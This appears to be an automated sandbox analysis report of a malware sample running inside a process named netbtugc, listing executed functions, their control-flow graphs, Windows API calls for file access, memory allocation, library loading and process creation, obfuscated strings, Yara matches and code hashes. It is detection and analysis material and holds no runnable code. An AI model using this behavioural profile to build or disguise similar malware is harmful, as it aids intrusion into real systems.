79457 427e36 79456->79457 79459 427e22 79456->79459 79457->79459 79460 426880 LdrInitializeThunk LdrInitializeThunk 79457->79460 79460->79459 79461 43abb0 79462 439a70 RtlFreeHeap 79461->79462 79463 43abc5 79462->79463 79464 2e52ad0 LdrInitializeThunk 79465 42923b 79466 42924a 79465->79466 79467 429251 79466->79467 79468 439a70 RtlFreeHeap 79466->79468 79468->79467

                                            Executed Functions

                                            Function 00419480 Relevance: 47.9, Strings: 38, Instructions: 446COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 26 419480-419958 27 419969-419975 26->27 28 41995a-419963 26->28 29 419977-419989 27->29 30 41998b-419995 27->30 28->27 29->28 31 4199a6-4199b2 30->31 32 4199c2-4199cc 31->32 33 4199b4-4199c0 31->33 35 4199dd-4199e9 32->35 33->31 36 4199eb-4199fd 35->36 37 4199ff-419a10 35->37 36->35 39 419a21-419a2d 37->39 40 419a3d-419a47 39->40 41 419a2f-419a3b 39->41 43 419a58-419a61 40->43 41->39 44 419a63-419a75 43->44 45 419a77-419a88 43->45 44->43 46 419a99-419aa5 45->46 48 419aa7-419ab0 46->48 49 419acc-419ad3 46->49 50 419ab2-419ab6 48->50 51 419ab7-419ab9 48->51 52 419ad5-419b08 49->52 53 419b0a 49->53 50->51 54 419abb-419ac4 51->54 55 419aca 51->55 52->49 56 419b11-419b1a 53->56 54->55 55->46 58 419b20-419b33 56->58 59 419de3-419ded 56->59 60 419b44-419b50 58->60 61 419e21-419e28 59->61 62 419def-419e0e 59->62 65 419b52-419b5b 60->65 66 419b68-419b6c 60->66 63 419e72-419e7c 61->63 64 419e2a-419e31 61->64 67 419e10-419e19 62->67 68 419e1f 62->68 69 419e33-419e50 64->69 70 419e52 call 439700 64->70 73 419b66 65->73 74 419b5d-419b63 65->74 71 419b87-419b91 66->71 72 419b6e-419b85 66->72 67->68 68->59 69->64 79 419e57-419e70 70->79 77 419b93-419bad 71->77 78 419bc8-419bd7 71->78 72->66 73->60 74->73 80 419bb4-419bb6 77->80 81 419baf-419bb3 77->81 82 419bd9 78->82 83 419bde-419be8 78->83 79->63 79->79 84 419bc6 80->84 85 419bb8-419bc0 80->85 81->80 82->59 86 419bf9-419c02 83->86 84->71 85->84 87 419c04-419c16 86->87 88 419c18-419c22 86->88 87->86 89 419c33-419c3f 88->89 91 419c41-419c4d 89->91 92 419c5d-419c67 89->92 93 419c5b 91->93 94 419c4f-419c55 91->94 95 419c78-419c81 92->95 93->89 94->93 97 419c83-419c95 95->97 98 419c97-419ca4 95->98 97->95 100 419caa-419cae 98->100 101 419cb0-419cc7 100->101 102 419cc9-419cd9 100->102 101->100 102->102 103 419cdb-419ce5 102->103 104 419cf6-419d02 103->104 105 419d04-419d16 104->105 106 419d18-419d24 104->106 105->104 108 419d26-419d47 106->108 109 419d49-419d53 106->109 108->106 110 419d64-419d70 109->110 111 419d83-419d8d 110->111 112 419d72-419d81 110->112 114 419d9e-419daa 111->114 112->110 115 419dc1-419dde 114->115 116 419dac-419dbf 114->116 115->56 116->114
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4190174668.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_410000_netbtugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: w$"1$%7$&l$,Z$/>$/F$0$8$9l$@h$A"$E$E&$L$NH$O{$Xo$Z$]$]S$_E$`q$f$g$gJ$gu$h$hY$hk$k$n$rx$v$)$,$g$k
                                            • API String ID: 0-4001259705
                                            • Opcode ID: 1184682ef84655718a00f8b6647a7115a93b2c507d8cd51f89ae939937310730
                                            • Instruction ID: 550fd85fa268e0646c93b424b055015d8f69474c852e912026092d20771e0559
                                            • Opcode Fuzzy Hash: 1184682ef84655718a00f8b6647a7115a93b2c507d8cd51f89ae939937310730
                                            • Instruction Fuzzy Hash: 22429EB0D05269CBEB24CF45C9A8BDDBBB1BB45308F2081DAC1496B281C7B95EC9CF45
                                            Function 0042BAB0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • FindFirstFileW.KERNELBASE(?,00000000), ref: 0042BB94
                                            • FindNextFileW.KERNELBASE(?,00000010), ref: 0042BBCF
                                            • FindClose.KERNELBASE(?), ref: 0042BBDA
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4190174668.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_410000_netbtugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNext
                                            • String ID:
                                            • API String ID: 3541575487-0
                                            • Opcode ID: 40fafa1aea30956ee374340ec8faf41636785d35b10ef79456dc0c171b2ef5a2
                                            • Instruction ID: 0a554449c43e9325c991dabdabc78d86d31977d9b458149c84f05f28993b841e
                                            • Opcode Fuzzy Hash: 40fafa1aea30956ee374340ec8faf41636785d35b10ef79456dc0c171b2ef5a2
                                            • Instruction Fuzzy Hash: 7031A3B1A002197BDB20DB61DC86FEF777CEF44708F14455DBA08A6181DB78AA84CBA4
                                            Function 00437920 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtCreateFile.NTDLL(?,000000E9,?,?,?,?,?,?,?,?,?), ref: 00437A06
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4190174668.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_410000_netbtugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: db2d222b4f28535e81006a854b07ad261685b7b3df404698942d3def3fcd3837
                                            • Instruction ID: 97ce1ce67a2d95fe3dcd660b7b64716220c739c39f73fac1d785234df249f114
                                            • Opcode Fuzzy Hash: db2d222b4f28535e81006a854b07ad261685b7b3df404698942d3def3fcd3837
                                            • Instruction Fuzzy Hash: 8731E1B5A01648AFCB14DF99D881EDFB7F9AF8C704F10820AF908A7340D774A8418BA5
                                            Function 00437A70 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtReadFile.NTDLL(?,000000E9,?,?,?,?,?,?,?), ref: 00437B45
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4190174668.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_410000_netbtugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 391251eefbc9ad381e8ba4752c904bf3950061ea70f9791e4aec23deb7fcac29
                                            • Instruction ID: b4aa8c29dea861785bc6f5d11f91e3dcc41150daa138777ff27561cb36327f12
                                            • Opcode Fuzzy Hash: 391251eefbc9ad381e8ba4752c904bf3950061ea70f9791e4aec23deb7fcac29
                                            • Instruction Fuzzy Hash: A4310A71A00608AFDB14DF99D881EEFB7B9EF8C714F10820AF918A7240D774A8518BA5
                                            Function 00437D30 Relevance: 1.6, APIs: 1, Instructions: 78memorynativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(0042165B,?,004369D7,00000000,00000004,00003000,?,?,?,?,?,004369D7,0042165B,?,00439A11,004369D7), ref: 00437DE4
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4190174668.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_410000_netbtugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: 75429a692b40c999ccd02512e5283f3b84b35ac49fffaa42beb723ca8b2bdc5b
                                            • Instruction ID: 33fadccfd60332d1ffd8dfb2e76d706525b1f1f4cc5de84f6be0e6c3d5b2db92
                                            • Opcode Fuzzy Hash: 75429a692b40c999ccd02512e5283f3b84b35ac49fffaa42beb723ca8b2bdc5b
                                            • Instruction Fuzzy Hash: 49214AB1600648AFDB10DF99DC41EAFB7B9EF88714F10860EFD18A7344D774A8518BA5
                                            Function 00437B50 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4190174668.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_410000_netbtugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: DeleteFile
                                            • String ID:
                                            • API String ID: 4033686569-0
                                            • Opcode ID: 20fa849fa18cb33331584df8e35a80326abb305d562f3fb28c37b66c0dbc9b53
                                            • Instruction ID: 323fdbf0a6b226a7e1b95494c7b7c7d19ad62ffa2b0accf2b9cfdc44ba225455
                                            • Opcode Fuzzy Hash: 20fa849fa18cb33331584df8e35a80326abb305d562f3fb28c37b66c0dbc9b53
                                            • Instruction Fuzzy Hash: DC01C4316017047FE620EBA5CC42FABB7ACDB89B14F00450EFA145B281DBB8B90487E9
                                            Function 00437BE0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00437C17
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4190174668.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_410000_netbtugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: 7d247b2f5c2795b6803d672ec31047245fb2947ae61ccffe6bc951da2d6e7933
                                            • Instruction ID: 9a0e69fbcc98b44f2c9189eb1058e86defd8e6ef7948ac032975997c260c059b
                                            • Opcode Fuzzy Hash: 7d247b2f5c2795b6803d672ec31047245fb2947ae61ccffe6bc951da2d6e7933
                                            • Instruction Fuzzy Hash: A8E04F322007047BD210EA5ACC41F9BB76CDFC6754F00401AFA08A7241C675B91087B9
                                            Function 004205D2 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 181COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 416 4205d2-4205df 417 4205e1-4205fb 416->417 418 420568 416->418 419 4205fe-420600 417->419 420 42059d-4205a9 418->420 422 420602-42060b 419->422 423 42061d 419->423 420->419 421 4205ab-4205b1 420->421 424 4205b2-4205b7 421->424 425 4205c0-4205c4 422->425 426 42060d-420619 422->426 427 420647 423->427 428 42061f-420629 423->428 424->425 430 4205c5-4205cc 425->430 426->423 429 420649-420660 427->429 428->424 431 42062b-42062d 428->431 432 420662-42066b 429->432 433 4206bc-4206c6 429->433 430->430 434 4205ce 430->434 435 42066f-42068e 432->435 437 420700-42076e call 439b10 call 43a520 call 4240a0 call 411420 call 430ee0 433->437 434->420 436 4205d0 434->436 435->435 438 420690-420699 435->438 436->416 452 420790-420795 437->452 453 420770-420781 PostThreadMessageW 437->453 438->429 440 42069b-4206a3 438->440 440->437 442 4206a5-4206ba 440->442 442->433 453->452 454 420783-42078d 453->454 454->452
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4190174668.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_410000_netbtugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: F56GKLK7U4$F56GKLK7U4
                                            • API String ID: 0-2839762430
                                            • Opcode ID: 9447954adc385025b70b311f7469ab317e80501ada11cd4050a658c8d1f3300b
                                            • Instruction ID: cda809766992ff4a109b39c5acabd74528f7e308e7fc4a3b067d8709c75780aa
                                            • Opcode Fuzzy Hash: 9447954adc385025b70b311f7469ab317e80501ada11cd4050a658c8d1f3300b
                                            • Instruction Fuzzy Hash: A051EB72A00669BBD711DA34D886BCABBF4EB55720F90025AE980DB283D7249543CB9D
                                            Function 004206F8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62threadwindowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 455 4206f8-42076e call 439b10 call 43a520 call 4240a0 call 411420 call 430ee0 467 420790-420795 455->467 468 420770-420781 PostThreadMessageW 455->468 468->467 469 420783-42078d 468->469 469->467
                                            APIs
                                            • PostThreadMessageW.USER32(F56GKLK7U4,00000111,00000000,00000000), ref: 0042077D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4190174668.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_410000_netbtugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID: F56GKLK7U4$F56GKLK7U4
                                            • API String ID: 1836367815-2839762430
                                            • Opcode ID: 0006bbca69ebf85fba32096ca151e8d08103d0d355250275e1f4d529af257a6d
                                            • Instruction ID: e22eed8b13732d7fab68a9954d73e849a35f8f23ef6d9ee7777f7602a785bca5
                                            • Opcode Fuzzy Hash: 0006bbca69ebf85fba32096ca151e8d08103d0d355250275e1f4d529af257a6d
                                            • Instruction Fuzzy Hash: 4A110C71E4021876DB21EA959C42FDF7B7C9F45B14F008059FA047B282E6786A028BE9
                                            Function 00420700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 470 420700-42076e call 439b10 call 43a520 call 4240a0 call 411420 call 430ee0 481 420790-420795 470->481 482 420770-420781 PostThreadMessageW 470->482 482->481 483 420783-42078d 482->483 483->481
                                            APIs
                                            • PostThreadMessageW.USER32(F56GKLK7U4,00000111,00000000,00000000), ref: 0042077D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4190174668.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_410000_netbtugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID: F56GKLK7U4$F56GKLK7U4
                                            • API String ID: 1836367815-2839762430
                                            • Opcode ID: d8ba68af7a922255352bf53ab66208c7b38438c7da1e66d6a84180756af733d4
                                            • Instruction ID: 50cabd63ee2b33bc72ae69b3ca97fbaa37099d448ba13f2f9b538ad4186f3eca
                                            • Opcode Fuzzy Hash: d8ba68af7a922255352bf53ab66208c7b38438c7da1e66d6a84180756af733d4
                                            • Instruction Fuzzy Hash: 9D01DB71E4021C76DB21AA919C02FDF7B7C9F45B54F004055FA047B1C1E6B86A028BE9
                                            Function 00437F30 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 00437F6F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4190174668.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_410000_netbtugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: U.B
                                            • API String ID: 3298025750-115547353
                                            • Opcode ID: 301f91a0926ea47cd6ac96144deb57becc561bcbbb4fd9ca55dd87dbd17baae1
                                            • Instruction ID: 88d5165d8881afe98eb20b932c2079dc60c6d6391e424dc8e54227cb4a4fcb12
                                            • Opcode Fuzzy Hash: 301f91a0926ea47cd6ac96144deb57becc561bcbbb4fd9ca55dd87dbd17baae1
                                            • Instruction Fuzzy Hash: B7E0E5B22013047BD614EE59DC46FAB77ACEF89754F104419FA08A7242D7B4B9108BB9
                                            Function 0042E850 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                            Download Yara Rule
                                            APIs
                                            • CoInitialize.OLE32(00000000), ref: 0042E867
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4190174668.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_410000_netbtugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Initialize
                                            • String ID: @J7<
                                            • API String ID: 2538663250-2016760708
                                            • Opcode ID: da73c5a719910af0c0e7d9aac22506276bfd97d49d93b4a74b71ca8677ee24b9
                                            • Instruction ID: acf89e8b89169f95b57a4bec809e06f959789354e6cf702a9f980d3d7230466f
                                            • Opcode Fuzzy Hash: da73c5a719910af0c0e7d9aac22506276bfd97d49d93b4a74b71ca8677ee24b9
                                            • Instruction Fuzzy Hash: BE3141B5A0020A9FDB00DFD9D8809EFB3B9BF88304F108559E505EB214D775EE45CBA0
                                            Function 0042E854 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 100COMMON
                                            Download Yara Rule
                                            APIs
                                            • CoInitialize.OLE32(00000000), ref: 0042E867
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4190174668.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_410000_netbtugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Initialize
                                            • String ID: @J7<
                                            • API String ID: 2538663250-2016760708
                                            • Opcode ID: f69a3344edb3d537d19e2d7384e962b82125176d8f55544750b292cf13607115
                                            • Instruction ID: 55347f03ef71899945abdf602dfb5da286850e6e1352fd95d2ed73cff92ff5b2
                                            • Opcode Fuzzy Hash: f69a3344edb3d537d19e2d7384e962b82125176d8f55544750b292cf13607115
                                            • Instruction Fuzzy Hash: DB3132B5A0021AAFDB00DFD9D8809EFB7B9FF88304B108559E505EB214D775EE45CBA0
                                            Function 0042412A Relevance: 1.6, APIs: 1, Instructions: 63libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00424112
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4190174668.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_410000_netbtugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: 447cf977fdca10ac1a33876b4063b1fb36cd6eb805c5acb8e85668d9b42e6eff
                                            • Instruction ID: f8249add4ae113188aad2d663519da91f6c27c2920b2cc1528bafb39b0873a7b
                                            • Opcode Fuzzy Hash: 447cf977fdca10ac1a33876b4063b1fb36cd6eb805c5acb8e85668d9b42e6eff
                                            • Instruction Fuzzy Hash: E01104371095645BC711D7B9A8402E5BFA0FFD2700B900197C4C197562C72294D5CA45
                                            Function 004240A0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00424112
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4190174668.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_410000_netbtugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: c4f1b7a0c2deee32b11db9dcdb1a94a2edac2addc0fb21761626480dafadee5a
                                            • Instruction ID: f8e76012d15ca374ae95b2f33b47516ef39384d5cbe7417176375622b323cd90
                                            • Opcode Fuzzy Hash: c4f1b7a0c2deee32b11db9dcdb1a94a2edac2addc0fb21761626480dafadee5a
                                            • Instruction Fuzzy Hash: 51011EB5E4020DABDF10DBA5EC46F9EB3B89F54308F00419AE90897281F675EB54CB96
                                            Function 00437FC0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessInternalW.KERNELBASE(?,?,?,?,00427993,00000010,?,?,?,00000044,?,00000010,00427993,?,?,?), ref: 00438023
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4190174668.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_410000_netbtugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateInternalProcess
                                            • String ID:
                                            • API String ID: 2186235152-0
                                            • Opcode ID: d5978d441bdf714258c55e79d7431949182b83d02229c66b29665a6c5ffabf93
                                            • Instruction ID: e4f05db62825912b55153cd21abefcf464eac9b8cc90382182114345e4df1f58
                                            • Opcode Fuzzy Hash: d5978d441bdf714258c55e79d7431949182b83d02229c66b29665a6c5ffabf93
                                            • Instruction Fuzzy Hash: 5301C0B2214208BFCB44DE89DC91EDB77ADAF8D754F008208FA09E3241D630F8518BA8
                                            Function 00419420 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00419465
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4190174668.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_410000_netbtugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateThread
                                            • String ID:
                                            • API String ID: 2422867632-0
                                            • Opcode ID: 4960b20eab2b1e01f7624305e1e4f75fa6e2da1af4118cb1547a7bbc82f425de
                                            • Instruction ID: 4a883080003c831c1efbe918dffbd25e9fb41aa0681bac0d6495bb06012a1f3f
                                            • Opcode Fuzzy Hash: 4960b20eab2b1e01f7624305e1e4f75fa6e2da1af4118cb1547a7bbc82f425de
                                            • Instruction Fuzzy Hash: 8BF0657334120436E32061AAAC03FD7739CCB84B65F14001AF70CEB1C1D595F88182E8
                                            Function 0041941F Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00419465
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4190174668.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_410000_netbtugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateThread
                                            • String ID:
                                            • API String ID: 2422867632-0
                                            • Opcode ID: 451d9bee397fbdfc728321a04e5799378be1b504500ecc7cfb2b8bc1e6056ab5
                                            • Instruction ID: 8b168edf84ba5efbdfef3604e297c90695ffceddfb6ce078e4d30ce9dd2b0bb5
                                            • Opcode Fuzzy Hash: 451d9bee397fbdfc728321a04e5799378be1b504500ecc7cfb2b8bc1e6056ab5
                                            • Instruction Fuzzy Hash: B0E0127764130476E23062AA9C03FD7779CCB85B65F15401AF70DAB2C1D999B98182ED
                                            Function 00437EE0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlAllocateHeap.NTDLL(00421319,?,004348DF,00421319,004342B7,004348DF,?,00421319,004342B7,00001000,?,?,00439760), ref: 00437F1F
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4190174668.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_410000_netbtugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: 09ca4b5f2ac78ed153d5c2e34071047771ad2360fb15b0f78534533631a75092
                                            • Instruction ID: b4ea5b51679808917010fec233b523e953eccb1064455d8c28f699e2026a3426
                                            • Opcode Fuzzy Hash: 09ca4b5f2ac78ed153d5c2e34071047771ad2360fb15b0f78534533631a75092
                                            • Instruction Fuzzy Hash: 10E06D722003087FD610EE59DC41E9B77ACEFC9714F008009FA08A7241DA34BC1087B9
                                            Function 004279D0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetFileAttributesW.KERNELBASE(?), ref: 004279FC
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4190174668.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_410000_netbtugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: cf231f8677e33c958fa969a7d586334994854ba62b57a385a59d6b6e2a2d6b77
                                            • Instruction ID: ab98acd24892ebe17367a76408fbaf69d36083cce1860b36423b49afdc53aa4c
                                            • Opcode Fuzzy Hash: cf231f8677e33c958fa969a7d586334994854ba62b57a385a59d6b6e2a2d6b77
                                            • Instruction Fuzzy Hash: 7CE0807135420417F7247568EC46F6B33588748774F544A51F91CDB3C1E57CF9419158
                                            Function 004277D7 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetErrorMode.KERNELBASE(00008003,?,?,00421600,004369D7,004342B7,?), ref: 00427813
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4190174668.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Offset: 00410000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_410000_netbtugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: be3b83389bf5683a0d351d48e87ad6cf3298daa2bf31b01b13a49c78ede9408f
                                            • Instruction ID: ccd5611d77bfdbcbeadf1392d6fe6c903dd1031c186bcf24434dba2cf4c462b9
                                            • Opcode Fuzzy Hash: be3b83389bf5683a0d351d48e87ad6cf3298daa2bf31b01b13a49c78ede9408f
                                            • Instruction Fuzzy Hash: 30E0C2733902012BF350F7A4EC07F2A36C9CB48758F004568B65CE62C3EA28E4048218